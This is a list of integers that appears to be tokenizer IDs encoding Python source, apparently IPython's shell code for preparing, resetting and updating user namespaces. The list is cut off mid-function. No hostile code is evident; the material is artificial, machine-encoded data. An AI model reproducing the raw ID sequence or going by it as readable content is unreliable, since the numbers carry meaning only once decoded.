45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 6101, 7535, 338, 2972, 3891, 43076, 198, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 4277, 62, 7220, 62, 14933, 43076, 796, 6407, 628, 220, 220, 220, 2488, 26745, 628, 220, 220, 220, 825, 8335, 62, 7220, 62, 21412, 7, 944, 11, 2836, 62, 21412, 28, 14202, 11, 2836, 62, 5907, 28, 14202, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 37534, 533, 262, 8265, 290, 25745, 287, 543, 2836, 2438, 481, 307, 1057, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 1649, 6101, 7535, 318, 2067, 7685, 11, 1111, 10007, 389, 6045, 25, 257, 649, 8265, 198, 220, 220, 220, 220, 220, 220, 220, 318, 2727, 6338, 11, 290, 663, 11593, 11600, 834, 973, 355, 262, 25745, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 1002, 691, 2836, 62, 21412, 318, 2810, 11, 663, 11593, 11600, 834, 318, 973, 355, 262, 25745, 13, 198, 220, 220, 220, 220, 220, 220, 220, 1002, 691, 2836, 62, 5907, 318, 2810, 11, 257, 31548, 8265, 318, 2727, 11, 290, 2836, 62, 5907, 198, 220, 220, 220, 220, 220, 220, 220, 4329, 262, 3298, 25745, 13, 1002, 1111, 389, 2810, 357, 292, 484, 743, 307, 198, 220, 220, 220, 220, 220, 220, 220, 618, 11525, 12083, 828, 2836, 62, 5907, 318, 262, 1957, 25745, 11, 290, 2836, 62, 21412, 198, 220, 220, 220, 220, 220, 220, 220, 3769, 262, 3298, 25745, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 21412, 1058, 8265, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 1459, 2836, 8265, 287, 543, 6101, 7535, 318, 852, 1057, 13, 1002, 6045, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 257, 3424, 8265, 481, 307, 2727, 13, 198, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 5907, 1058, 8633, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 317, 25745, 287, 543, 284, 1057, 14333, 9729, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 198, 220, 220, 220, 220, 220, 220, 220, 35656, 198, 220, 220, 220, 220, 220, 220, 220, 317, 46545, 286, 2836, 62, 21412, 290, 2836, 62, 5907, 11, 1123, 6105, 4238, 1417, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 2836, 62, 21412, 318, 6045, 290, 2836, 62, 5907, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 5907, 13, 2617, 12286, 7203, 834, 3672, 834, 1600, 366, 834, 12417, 834, 4943, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 21412, 796, 360, 13513, 5841, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 21412, 13, 834, 11600, 834, 796, 2836, 62, 5907, 628, 220, 220, 220, 220, 220, 220, 220, 611, 2836, 62, 21412, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 21412, 796, 3858, 13, 26796, 6030, 7203, 834, 12417, 834, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2205, 2625, 38062, 4142, 2727, 8265, 329, 6101, 7535, 14333, 2858, 4943, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 775, 1276, 4155, 326, 11593, 18780, 259, 834, 357, 19419, 262, 2457, 705, 82, 11537, 318, 1464, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 1695, 290, 10609, 284, 262, 11593, 18780, 259, 834, 1635, 21412, 24620, 220, 1114, 517, 3307, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2638, 1378, 4529, 13, 29412, 13, 2398, 14, 79, 9346, 4529, 14, 29412, 12, 7959, 14, 14585, 12, 16784, 14, 486, 1821, 3104, 13, 6494, 198, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 21412, 13, 834, 11600, 834, 13, 2617, 12286, 10786, 834, 18780, 259, 834, 3256, 3170, 259, 62, 4666, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 21412, 13, 834, 11600, 834, 13, 2617, 12286, 10786, 834, 18780, 1040, 834, 3256, 3170, 259, 62, 4666, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 2836, 62, 5907, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 5907, 796, 2836, 62, 21412, 13, 834, 11600, 834, 628, 220, 220, 220, 220, 220, 220, 220, 1441, 2836, 62, 21412, 11, 2836, 62, 5907, 628, 220, 220, 220, 825, 2315, 62, 7220, 62, 5907, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 24243, 1096, 477, 2836, 12, 23504, 3891, 43076, 284, 511, 5288, 26235, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16272, 2106, 8341, 389, 635, 23224, 994, 11, 355, 484, 6840, 198, 220, 220, 220, 220, 220, 220, 220, 719, 355, 2836, 3891, 43076, 13, 628, 220, 220, 220, 220, 220, 220, 220, 11822, 198, 220, 220, 220, 220, 220, 220, 220, 37404, 198, 220, 220, 220, 220, 220, 220, 220, 1439, 1366, 8573, 994, 389, 691, 5901, 287, 11, 484, 389, 5626, 13259, 416, 428, 198, 220, 220, 220, 220, 220, 220, 220, 2446, 13, 220, 1002, 484, 547, 407, 6565, 878, 11, 1366, 481, 2391, 307, 2087, 284, 198, 220, 220, 220, 220, 220, 220, 220, 606, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 770, 2163, 2499, 287, 734, 3354, 25, 717, 356, 1234, 257, 1178, 1243, 287, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2836, 62, 5907, 11, 290, 356, 17510, 326, 10154, 656, 2836, 62, 5907, 62, 30342, 523, 326, 777, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 4238, 9633, 3588, 470, 3402, 416, 4064, 8727, 13, 220, 2293, 262, 17510, 11, 356, 751, 262, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 1334, 286, 644, 356, 1635, 4598, 9, 765, 262, 2836, 284, 766, 351, 4064, 8727, 772, 319, 257, 649, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 6246, 357, 26949, 2147, 11, 523, 484, 1107, 691, 766, 511, 898, 3404, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 383, 2836, 8633, 1276, 1635, 33770, 9, 423, 257, 11593, 18780, 259, 834, 4941, 284, 262, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 11361, 3210, 11593, 18780, 259, 834, 25745, 11, 220, 543, 1276, 307, 17392, 13, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 770, 318, 523, 326, 1728, 4560, 287, 6152, 12660, 460, 307, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 26995, 10945, 351, 3170, 1040, 13, 220, 5740, 326, 356, 460, 5626, 779, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 11593, 18780, 1040, 834, 357, 11295, 262, 705, 82, 33809, 220, 780, 326, 460, 2035, 307, 257, 8633, 393, 257, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 8265, 11, 290, 460, 772, 4517, 378, 379, 19124, 11, 6906, 319, 262, 4732, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 357, 37906, 1838, 645, 19026, 319, 340, 737, 220, 554, 6273, 11, 11593, 18780, 259, 834, 318, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 1464, 257, 8265, 2134, 11, 996, 340, 1276, 307, 11777, 17392, 13, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 1114, 517, 3307, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2638, 1378, 4529, 13, 29412, 13, 2398, 14, 79, 9346, 4529, 14, 29412, 12, 7959, 14, 14585, 12, 16784, 14, 486, 1821, 3104, 13, 6494, 198, 220, 220, 220, 220, 220, 220, 220, 36545, 796, 23884, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 787, 3298, 9633, 329, 2836, 1895, 284, 262, 25985, 198, 220, 220, 220, 220, 220, 220, 220, 36545, 17816, 62, 4449, 20520, 796, 2116, 13, 23569, 62, 37153, 13, 15414, 62, 10034, 62, 79, 945, 276, 198, 220, 220, 220, 220, 220, 220, 220, 36545, 17816, 62, 1219, 20520, 796, 2116, 13, 23569, 62, 37153, 13, 22915, 62, 10034, 198, 220, 220, 220, 220, 220, 220, 220, 36545, 17816, 62, 34985, 20520, 796, 2116, 13, 23569, 62, 37153, 13, 15908, 62, 10034, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 2836, 47217, 284, 5128, 290, 5072, 25985, 13, 220, 2312, 6584, 470, 905, 510, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 287, 4064, 8727, 11, 355, 484, 460, 423, 845, 1588, 41575, 82, 13, 198, 220, 220, 220, 220, 220, 220, 220, 36545, 17816, 818, 20520, 220, 796, 2116, 13, 23569, 62, 37153, 13, 15414, 62, 10034, 62, 79, 945, 276, 198, 220, 220, 220, 220, 220, 220, 220, 36545, 17816, 7975, 20520, 796, 2116, 13, 23569, 62, 37153, 13, 22915, 62, 10034, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 9363, 3589, 355, 262, 1171, 40391, 10185, 198, 220, 220, 220, 220, 220, 220, 220, 36545, 17816, 1136, 62, 541, 7535, 20520, 796, 2116, 13, 1136, 62, 541, 7535, 628, 220, 220, 220, 220, 220, 220, 220, 36545, 17816, 37023, 20520, 796, 2116, 13, 1069, 2676, 198, 220, 220, 220, 220, 220, 220, 220, 36545, 17816, 47391, 20520, 796, 2116, 13, 1069, 2676, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 35908, 644, 356, 1053, 2087, 523, 1290, 284, 2836, 62, 5907, 62, 30342, 523, 777, 3588, 470, 1775, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 416, 4064, 8727, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 7220, 62, 5907, 62, 30342, 13, 19119, 7, 5907, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 21035, 1234, 656, 36545, 783, 561, 905, 510, 287, 4064, 8727, 13, 220, 11382, 5403, 878, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 5137, 1997, 994, 11, 355, 356, 1107, 765, 4064, 8727, 284, 905, 262, 2836, 511, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 3404, 11, 407, 674, 9633, 13, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 9461, 11, 4296, 262, 1103, 2836, 338, 25745, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 7220, 62, 5907, 13, 19119, 7, 5907, 8, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 477, 62, 5907, 62, 5420, 82, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 3855, 257, 1351, 286, 10288, 284, 477, 262, 25745, 48589, 3166, 287, 543, 198, 220, 220, 220, 220, 220, 220, 220, 6101, 7535, 1244, 3650, 257, 2836, 12, 25598, 2134, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 5740, 326, 428, 857, 407, 2291, 262, 3359, 25480, 11, 543, 635, 50177, 198, 220, 220, 220, 220, 220, 220, 220, 5563, 422, 262, 5072, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 685, 944, 13, 7220, 62, 5907, 11, 2116, 13, 7220, 62, 20541, 62, 5907, 11, 2116, 13, 7220, 62, 5907, 62, 30342, 60, 1343, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 685, 76, 13, 834, 11600, 834, 329, 285, 287, 2116, 13557, 12417, 62, 4666, 62, 23870, 13, 27160, 3419, 60, 628, 220, 220, 220, 825, 13259, 7, 944, 11, 649, 62, 29891, 28, 17821, 11, 8361, 28, 25101, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 19856, 477, 5387, 3891, 43076, 11, 290, 2230, 284, 2650, 10288, 284, 198, 220, 220, 220, 220, 220, 220, 220, 2836, 5563, 13, 628, 220, 220, 220, 220, 220, 220, 220, 1002, 649, 62, 29891, 318, 6407, 11, 257, 649, 2106, 6246, 481, 307, 4721, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 11459, 25985, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 23569, 62, 37153, 13, 42503, 7, 3605, 62, 29891, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 30027, 3753, 973, 284, 6376, 477, 25985, 198, 220, 220, 220, 220, 220, 220, 220, 611, 649, 62, 29891, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 18558, 1009, 62, 9127, 796, 352, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 30027, 938, 9706, 1255, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12957, 62, 18558, 1009, 62, 82, 1229, 2707, 276, 796, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12957, 62, 18558, 1009, 62, 20274, 796, 6045, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 1610, 1530, 39986, 5072, 3709, 198, 220, 220, 220, 220, 220, 220, 220, 611, 2116, 13, 13812, 25480, 13, 4598, 62, 12853, 62, 23870, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 13812, 25480, 13, 25925, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 383, 1388, 9706, 3891, 43076, 1276, 307, 12539, 845, 7773, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 31017, 262, 39948, 286, 262, 3170, 259, 12, 5363, 8251, 11, 780, 1804, 523, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 561, 2728, 8563, 287, 867, 2134, 338, 11593, 12381, 834, 5050, 13, 198, 220, 220, 220, 220, 220, 220, 220, 611, 2116, 13, 7220, 62, 5907, 318, 407, 2116, 13, 7220, 62, 20541, 62, 5907, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 7220, 62, 5907, 13, 20063, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 36545, 796, 2116, 13, 7220, 62, 20541, 62, 5907, 198, 220, 220, 220, 220, 220, 220, 220, 4268, 62, 13083, 796, 900, 7, 5907, 13, 13083, 28955, 198, 220, 220, 220, 220, 220, 220, 220, 4268, 62, 13083, 13, 15410, 446, 10786, 834, 18780, 259, 834, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 4268, 62, 13083, 13, 15410, 446, 10786, 834, 18780, 1040, 834, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 4268, 62, 13083, 13, 15410, 446, 10786, 834, 3672, 834, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 329, 479, 287, 4268, 62, 13083, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1619, 36545, 58, 74, 60, 628, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 7220, 62, 5907, 62, 30342, 13, 20063, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 42019, 262, 2836, 3891, 43076, 284, 10926, 42863, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 15003, 62, 7220, 62, 5907, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 611, 8361, 290, 407, 468, 35226, 7, 944, 11, 45434, 17597, 62, 18170, 62, 13083, 1, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 7203, 34, 34574, 11169, 25064, 13, 21412, 11, 645, 27479, 4943, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 8361, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 7203, 66, 724, 278, 25064, 8265, 9313, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1459, 62, 13083, 796, 900, 7, 17597, 13, 18170, 13, 13083, 28955, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 479, 287, 1459, 62, 13083, 532, 2116, 13557, 17597, 62, 18170, 62, 13083, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 479, 13, 9688, 2032, 342, 7203, 16680, 541, 305, 919, 278, 1, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2555, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1619, 25064, 13, 18170, 58, 74, 60, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 42019, 262, 4277, 290, 2836, 47217, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 26011, 62, 37153, 13, 20063, 62, 7344, 1386, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 26011, 62, 37153, 13, 15003, 62, 7344, 1386, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 2735, 8160, 47217, 326, 691, 787, 2565, 319, 262, 12094, 11, 780, 484, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 761, 1277, 1895, 284, 262, 8624, 287, 257, 835, 326, 356, 460, 470, 33836, 287, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 25757, 393, 3992, 2166, 437, 198, 220, 220, 220, 220, 220, 220, 220, 611, 28686, 13, 3672, 6624, 705, 1930, 844, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 23991, 287, 19203, 20063, 3256, 705, 3549, 3256, 705, 1203, 3256, 705, 805, 6, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 23991, 407, 287, 2116, 13, 19726, 873, 62, 37153, 13, 19726, 873, 17816, 1370, 6, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 26011, 62, 37153, 13, 4215, 62, 13086, 62, 26011, 7, 28758, 11, 23991, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 1610, 1530, 262, 2839, 1351, 286, 8265, 10288, 4030, 329, 4226, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 9706, 4800, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 20063, 62, 12417, 62, 4666, 62, 23870, 3419, 628, 220, 220, 220, 825, 1619, 62, 7785, 7, 944, 11, 1401, 3672, 11, 416, 62, 3672, 28, 25101, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 38727, 257, 7885, 422, 262, 2972, 3891, 43076, 11, 523, 326, 11, 355, 198, 220, 220, 220, 220, 220, 220, 220, 1290, 355, 1744, 11, 356, 821, 407, 5291, 597, 7104, 10288, 284, 340, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 1401, 3672, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 1438, 286, 262, 7885, 284, 12233, 13, 198, 220, 220, 220, 220, 220, 220, 220, 416, 62, 3672, 1058, 20512, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 11, 12233, 9633, 351, 262, 1813, 1438, 287, 1123, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 25745, 13, 1002, 10352, 357, 12286, 828, 1064, 262, 7885, 287, 262, 2836, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 25745, 11, 290, 12233, 10288, 284, 340, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 1401, 3672, 287, 19203, 834, 18780, 259, 834, 3256, 705, 834, 18780, 1040, 834, 6, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 11052, 12331, 7203, 8134, 3500, 284, 12233, 4064, 82, 1, 4064, 1401, 3672, 8, 628, 220, 220, 220, 220, 220, 220, 220, 36545, 62, 5420, 82, 796, 2116, 13, 439, 62, 5907, 62, 5420, 82, 628, 220, 220, 220, 220, 220, 220, 220, 611, 416, 62, 3672, 25, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 23520, 416, 1438, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 36545, 287, 36545, 62, 5420, 82, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1619, 36545, 58, 85, 1501, 480, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 7383, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1208, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 23520, 416, 2134, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26181, 796, 2116, 13, 7220, 62, 5907, 58, 85, 1501, 480, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 7383, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 6530, 12331, 7203, 3672, 705, 4, 82, 6, 318, 407, 5447, 1, 4064, 1401, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 4418, 2198, 287, 5072, 2106, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 36545, 62, 5420, 82, 13, 33295, 7, 944, 13, 23569, 62, 37153, 13, 22915, 62, 10034, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 36545, 287, 36545, 62, 5420, 82, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 284, 62, 33678, 796, 685, 77, 329, 299, 11, 267, 287, 36545, 13, 23814, 3419, 611, 267, 318, 26181, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 1438, 287, 284, 62, 33678, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1619, 36545, 58, 3672, 60, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 48987, 340, 318, 4615, 422, 262, 938, 9706, 1255, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2116, 13, 12957, 62, 18558, 1009, 62, 20274, 13, 20274, 318, 26181, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12957, 62, 18558, 1009, 62, 20274, 796, 6045, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3359, 25480, 7622, 3131, 10288, 11, 475, 407, 287, 257, 22155, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 1438, 287, 19203, 62, 3256, 705, 834, 3256, 705, 17569, 6, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 651, 35226, 7, 944, 13, 13812, 25480, 11, 1438, 8, 318, 26181, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 900, 35226, 7, 944, 13, 13812, 25480, 11, 1438, 11, 6045, 8, 628, 220, 220, 220, 825, 13259, 62, 19738, 425, 7, 944, 11, 40364, 28, 14202, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 19856, 21792, 9633, 422, 5387, 3891, 43076, 1912, 319, 257, 198, 220, 220, 220, 220, 220, 220, 220, 7368, 3218, 5408, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 40364, 1058, 4731, 393, 14102, 3912, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 317, 3218, 5408, 3912, 326, 481, 307, 973, 287, 10342, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7885, 3891, 287, 262, 2985, 3891, 43076, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 40364, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 285, 796, 302, 13, 5589, 576, 7, 260, 25636, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 5994, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 5994, 12331, 10786, 260, 25636, 1276, 307, 257, 4731, 393, 14102, 3912, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 11140, 329, 8251, 287, 1123, 25745, 326, 2872, 262, 1813, 40364, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1002, 257, 2872, 318, 1043, 11, 12233, 262, 1994, 14, 8367, 5166, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 36545, 287, 2116, 13, 439, 62, 5907, 62, 5420, 82, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 1401, 287, 36545, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 285, 13, 12947, 7, 7785, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1619, 36545, 58, 7785, 60, 628, 220, 220, 220, 825, 4574, 7, 944, 11, 9633, 11, 14333, 28, 17821, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 818, 752, 257, 1448, 286, 9633, 656, 262, 6101, 7535, 2836, 25745, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 9633, 1058, 8633, 11, 965, 393, 1351, 14, 83, 29291, 286, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 9633, 284, 8677, 656, 262, 2836, 338, 25745, 13, 220, 1002, 257, 8633, 11, 257, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2829, 4296, 318, 1760, 13, 220, 1002, 257, 965, 11, 262, 4731, 318, 9672, 284, 423, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7885, 3891, 11266, 416, 9029, 13, 220, 317, 1351, 14, 83, 29291, 286, 965, 460, 635, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 307, 973, 284, 1577, 262, 7885, 3891, 13, 220, 1002, 655, 262, 7885, 3891, 389, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1577, 357, 4868, 14, 83, 29291, 14, 2536, 8, 788, 262, 7885, 3815, 3114, 510, 287, 262, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 869, 364, 5739, 13, 198, 220, 220, 220, 220, 220, 220, 220, 14333, 1058, 20512, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 357, 12286, 828, 262, 9633, 481, 307, 5610, 351, 262, 7559, 8727, 15506, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5536, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 410, 11600, 796, 6045, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 775, 761, 257, 8633, 286, 1438, 14, 8367, 14729, 284, 466, 25745, 5992, 13, 198, 220, 220, 220, 220, 220, 220, 220, 611, 318, 39098, 7, 25641, 2977, 11, 8633, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 410, 11600, 796, 9633, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 318, 39098, 7, 25641, 2977, 11, 357, 2536, 11, 1351, 11, 46545, 8, 2599, 198, 220, 220, 220, 220, 220, 220, 